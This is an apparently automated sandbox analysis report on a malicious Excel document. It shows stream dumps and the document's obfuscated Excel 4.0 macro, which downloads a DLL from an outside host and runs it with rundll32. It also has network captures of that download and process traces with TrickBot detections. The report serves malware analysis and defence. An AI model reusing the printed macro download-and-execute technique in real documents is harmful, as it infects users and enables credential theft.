                            File Type:data
                            Stream Size:4096
                            Entropy:0.305356156469
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . { . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . S h e e t 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 bc 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 7b 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 04 00 00 00
                            Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                            General
                            Stream Path:\x5SummaryInformation
                            File Type:data
                            Stream Size:4096
                            Entropy:0.2540711905
                            Base64 Encoded:True
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . P . . . . . . . h . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 4 6 5 . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . . , G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 88 00 00 00 06 00 00 00 01 00 00 00 38 00 00 00 08 00 00 00 40 00 00 00 12 00 00 00 50 00 00 00 0c 00 00 00 68 00 00 00 0d 00 00 00 74 00 00 00 13 00 00 00 80 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00 35 34 36 35 00 00 00 00
                            Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 271852
                            General
                            Stream Path:Book
                            File Type:Applesoft BASIC program data, first line number 8
                            Stream Size:271852
                            Entropy:3.18811060737
                            Base64 Encoded:True
                            Data ASCII:. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . 5 4 6 5 B . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . . . . . . . . . . . . . . H A L T . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . _ . . . . . . . . . . . . . . . . .
                            Data Raw:09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 04 35 34 36 35 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                            Macro 4.0 Code

                            ,,,,,,,,,,"=WORKBOOK.DELETE(""Sheet1"")=WORKBOOK.DELETE(""Sheet2"")=WORKBOOK.DELETE(""Sheet3"")",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=ACOS(54418415151515100)=ASIN(4518181515151510)=COS(54111551)=ACOS(54515151)=ACOS(54418415151515100)=ASIN(4518181515151510)=COS(54111551)=ACOS(54515151)=ACOS(54418415151515100)=ASIN(4518181515151510)=COS(54111551)=ACOS(54515151)=ACOS(54418415151515100)=ASIN(4518181515151510)=COS(54111551)=ACOS(54515151)=ACOS(54418415151515100)=ASIN(4518181515151510)=COS(54111551)=ACOS(54515151)=ACOS(54418415151515100)=ASIN(4518181515151510)=COS(54111551)=ACOS(54515151)=ACOS(54418415151515100)=ASIN(4518181515151510)=COS(54111551)=ACOS(54515151)=ACOS(54418415151515100)=ASIN(4518181515151510)=COS(54111551)=ACOS(54515151)=ACOS(54418415151515100)=ASIN(4518181515151510)=COS(54111551)=ACOS(54515151)=""""&""""&""""&""""&""""&""""&""""&""""&""""&CALL(""U""&before.2.8.95.sheet!CZ24&before.2.8.95.sheet!CZ25&before.2.8.95.sheet!CZ26&before.2.8.95.sheet!CZ27&""n"",""UR""&before.2.8.95.sheet!DA25&before.2.8.95.sheet!DA26&before.2.8.95.sheet!DA27&Sheet3!BC38&Sheet3!BC39&Sheet3!BC40&Sheet3!BC41&Sheet3!BC42&Sheet3!BC43&Sheet3!BC44&Sheet3!BC45&Sheet3!BC46&Sheet3!BC47&Sheet3!BC48&Sheet3!BC49&Sheet3!BC50,Sheet3!BG18&Sheet3!BG19&Sheet3!BG20&Sheet3!BG21,0,Sheet3!BH18&Sheet3!BH19&Sheet3!BH20&Sheet3!BH21,Sheet3!BH28,0,0)",,,,,,,,,,,,,,,,,,,,,=GOTO(before.2.8.95.sheet!DM21),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,R,,,,,,,,,,,,,"=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&EXEC(""ru""&before.2.8.95.sheet!DC25&before.2.8.95.sheet!DC26&before.2.8.95.sheet!DC27&Sheet3!BD38&Sheet3!BD39&Sheet3!BD40&Sheet3!BD41&Sheet3!BH28&Sheet3!BF17&Sheet3!BF18&Sheet3!BF19&Sheet3!BF20&Sheet3!BF21&Sheet3!BE38&Sheet3!BE39)=RUN(before.2.8.95.sheet!DB8)=ACOS(54418415151515100)=ASIN(4518181515151510)=COS(54111551)=ACOS(54515151)=ACOS(54418415151515100)=ASIN(4518181515151510)=COS(54111551)=ACOS(54515151)=ACOS(54418415151515100)=ASIN(4518181515151510)=COS(54111551)=ACOS(54515151)=ACOS(54418415151515100)=ACOS(54418415151515100)=ASIN(4518181515151510)=COS(54111551)=ACOS(54515151)=ACOS(54418415151515100)=ASIN(4518181515151510)=COS(54111551)=ACOS(54515151)=ACOS(54418415151515100)=ASIN(4518181515151510)=COS(54111551)=ACOS(54515151)=ACOS(54418415151515100)",,,,,,,,"=""L""","=""L""",,"=""n""",,,,,,,,,,,,,,,,,,"=""M""","=""D""",,"=""d""",,,,,,,,,,,,,,,,,,"=""o""","=""o""",,"=""l""",,,,,,,,,,

                            Network Behavior

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            May 12, 2021 18:42:55.492877960 CEST4916780192.168.2.22198.54.114.131
                            May 12, 2021 18:42:55.682590008 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:55.682733059 CEST4916780192.168.2.22198.54.114.131
                            May 12, 2021 18:42:55.683294058 CEST4916780192.168.2.22198.54.114.131
                            May 12, 2021 18:42:55.879472971 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:55.879513025 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:55.879534006 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:55.879559040 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:55.879581928 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:55.879606009 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:55.879633904 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:55.879657984 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:55.879682064 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:55.879704952 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:55.879729986 CEST4916780192.168.2.22198.54.114.131
                            May 12, 2021 18:42:55.879764080 CEST4916780192.168.2.22198.54.114.131
                            May 12, 2021 18:42:55.879769087 CEST4916780192.168.2.22198.54.114.131
                            May 12, 2021 18:42:55.879772902 CEST4916780192.168.2.22198.54.114.131
                            May 12, 2021 18:42:55.879776001 CEST4916780192.168.2.22198.54.114.131
                            May 12, 2021 18:42:55.885046005 CEST4916780192.168.2.22198.54.114.131
                            May 12, 2021 18:42:56.070539951 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:56.070570946 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:56.070588112 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:56.070609093 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:56.070633888 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:56.070717096 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:56.070743084 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:56.070771933 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:56.070797920 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:56.070827007 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:56.070861101 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:56.070893049 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:56.070921898 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:56.070951939 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:56.070983887 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:56.071084023 CEST4916780192.168.2.22198.54.114.131
                            May 12, 2021 18:42:56.071130991 CEST4916780192.168.2.22198.54.114.131
                            May 12, 2021 18:42:56.071137905 CEST4916780192.168.2.22198.54.114.131
                            May 12, 2021 18:42:56.071142912 CEST4916780192.168.2.22198.54.114.131
                            May 12, 2021 18:42:56.071149111 CEST4916780192.168.2.22198.54.114.131
                            May 12, 2021 18:42:56.071154118 CEST4916780192.168.2.22198.54.114.131
                            May 12, 2021 18:42:56.071157932 CEST4916780192.168.2.22198.54.114.131
                            May 12, 2021 18:42:56.071161985 CEST4916780192.168.2.22198.54.114.131
                            May 12, 2021 18:42:56.071166992 CEST4916780192.168.2.22198.54.114.131
                            May 12, 2021 18:42:56.076288939 CEST4916780192.168.2.22198.54.114.131
                            May 12, 2021 18:42:56.260648966 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:56.260708094 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:56.260747910 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:56.260786057 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:56.260823965 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:56.260862112 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:56.260881901 CEST4916780192.168.2.22198.54.114.131
                            May 12, 2021 18:42:56.260916948 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:56.260924101 CEST4916780192.168.2.22198.54.114.131
                            May 12, 2021 18:42:56.260931015 CEST4916780192.168.2.22198.54.114.131
                            May 12, 2021 18:42:56.260935068 CEST4916780192.168.2.22198.54.114.131
                            May 12, 2021 18:42:56.260962963 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:56.260974884 CEST4916780192.168.2.22198.54.114.131
                            May 12, 2021 18:42:56.261003017 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:56.261023045 CEST4916780192.168.2.22198.54.114.131
                            May 12, 2021 18:42:56.261044025 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:56.261065006 CEST4916780192.168.2.22198.54.114.131
                            May 12, 2021 18:42:56.261082888 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:56.261095047 CEST4916780192.168.2.22198.54.114.131
                            May 12, 2021 18:42:56.261125088 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:56.261142015 CEST4916780192.168.2.22198.54.114.131
                            May 12, 2021 18:42:56.261162996 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:56.261183977 CEST4916780192.168.2.22198.54.114.131
                            May 12, 2021 18:42:56.261202097 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:56.261225939 CEST4916780192.168.2.22198.54.114.131
                            May 12, 2021 18:42:56.261250019 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:56.261253119 CEST4916780192.168.2.22198.54.114.131
                            May 12, 2021 18:42:56.261292934 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:56.261312962 CEST4916780192.168.2.22198.54.114.131
                            May 12, 2021 18:42:56.261331081 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:56.261348963 CEST4916780192.168.2.22198.54.114.131
                            May 12, 2021 18:42:56.261368990 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:56.261387110 CEST4916780192.168.2.22198.54.114.131
                            May 12, 2021 18:42:56.261440992 CEST4916780192.168.2.22198.54.114.131
                            May 12, 2021 18:42:56.261467934 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:56.261502028 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:56.261532068 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:56.261563063 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:56.261603117 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:56.261611938 CEST4916780192.168.2.22198.54.114.131
                            May 12, 2021 18:42:56.261646032 CEST4916780192.168.2.22198.54.114.131
                            May 12, 2021 18:42:56.261665106 CEST4916780192.168.2.22198.54.114.131
                            May 12, 2021 18:42:56.262837887 CEST4916780192.168.2.22198.54.114.131
                            May 12, 2021 18:42:56.266028881 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:56.266113043 CEST4916780192.168.2.22198.54.114.131
                            May 12, 2021 18:42:56.451127052 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:56.451167107 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:56.451191902 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:56.451215982 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:56.451240063 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:56.451263905 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:56.451294899 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:56.451318979 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:56.451342106 CEST8049167198.54.114.131192.168.2.22
                            May 12, 2021 18:42:56.451349974 CEST4916780192.168.2.22198.54.114.131

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            May 12, 2021 18:42:55.414016962 CEST5219753192.168.2.228.8.8.8
                            May 12, 2021 18:42:55.474991083 CEST53521978.8.8.8192.168.2.22

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                            May 12, 2021 18:42:55.414016962 CEST192.168.2.228.8.8.80xfc39Standard query (0)koneckotechnology.comA (IP address)IN (0x0001)

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                            May 12, 2021 18:42:55.474991083 CEST8.8.8.8192.168.2.220xfc39No error (0)koneckotechnology.com198.54.114.131A (IP address)IN (0x0001)

                            HTTP Request Dependency Graph

                            • koneckotechnology.com

                            HTTP Packets

                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            0192.168.2.2249167198.54.114.13180C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            TimestampkBytes transferredDirectionData
                            May 12, 2021 18:42:55.683294058 CEST0OUTGET /netmons.dll HTTP/1.1
                            Accept: */*
                            UA-CPU: AMD64
                            Accept-Encoding: gzip, deflate
                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                            Host: koneckotechnology.com
                            Connection: Keep-Alive
                            May 12, 2021 18:42:55.879472971 CEST2INHTTP/1.1 200 OK
                            date: Wed, 12 May 2021 16:42:55 GMT
                            server: Apache
                            last-modified: Wed, 12 May 2021 13:22:52 GMT
                            accept-ranges: bytes
                            content-length: 643072
                            content-type: application/x-msdownload
                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 67 5d 9f e5 23 3c f1 b6 23 3c f1 b6 23 3c f1 b6 a0 34 ae b6 29 3c f1 b6 d9 1f e8 b6 25 3c f1 b6 30 34 ac b6 21 3c f1 b6 26 30 fe b6 38 3c f1 b6 26 30 ae b6 a9 3c f1 b6 23 3c f0 b6 62 3e f1 b6 a0 34 ac b6 30 3c f1 b6 26 30 91 b6 57 3c f1 b6 26 30 ad b6 22 3c f1 b6 cf 37 af b6 22 3c f1 b6 26 30 ab b6 22 3c f1 b6 52 69 63 68 23 3c f1 b6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c1 ab 9b 60 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 07 0a 00 80 02 00 00 40 07 00 00 00 00 00 9a f2 00 00 00 10 00 00 00 90 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 0a 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 3e 03 00 45 00 00 00 5c 21 03 00 04 01 00 00 00 a0 03 00 7c cf 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 09 00 80 34 00 00 a0 95 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 e6 02 00 48 00 00 00 00 00 00 00 00 00 00 00 00 90 02 00 94 05 00 00 d4 20 03 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9e 78 02 00 00 10 00 00 00 80 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 55 ae 00 00 00 90 02 00 00 b0 00 00 00 90 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a4 59 00 00 00 40 03 00 00 30 00 00 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 7c cf 05 00 00 a0 03 00 00 d0 05 00 00 70 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 04 81 00 00 00 70 09 00 00 90 00 00 00 40 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$g]#<#<#<4)<%<04!<&08<&0<#<b>40<&0W<&0"<7"<&0"<Rich#<PEL`!@>E\!|p4H @.textx `.rdataU@@.dataY@0@@.rsrc|p@@.relocp@@B


                            Code Manipulations

                            Statistics

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Start time:18:42:38
                            Start date:12/05/2021
                            Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            Wow64 process (32bit):false
                            Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                            Imagebase:0x13f1b0000
                            File size:27641504 bytes
                            MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Start time:18:42:43
                            Start date:12/05/2021
                            Path:C:\Windows\System32\rundll32.exe
                            Wow64 process (32bit):false
                            Commandline:rundll32 ..\hsdksksk.iem,StartW
                            Imagebase:0xffae0000
                            File size:45568 bytes
                            MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Start time:18:42:43
                            Start date:12/05/2021
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32 ..\hsdksksk.iem,StartW
                            Imagebase:0xe90000
                            File size:44544 bytes
                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2096107632.0000000000310000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2096083539.0000000000291000.00000020.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2096003608.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2096037791.0000000000224000.00000004.00000001.sdmp, Author: Joe Security
                            Reputation:high

                            General

                            Start time:18:42:44
                            Start date:12/05/2021
                            Path:C:\Windows\System32\wermgr.exe
                            Wow64 process (32bit):
                            Commandline:C:\Windows\system32\wermgr.exe
                            Imagebase:
                            File size:50688 bytes
                            MD5 hash:41DF7355A5A907E2C1D7804EC028965D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate

                            Disassembly

                            Code Analysis

                            Reset < >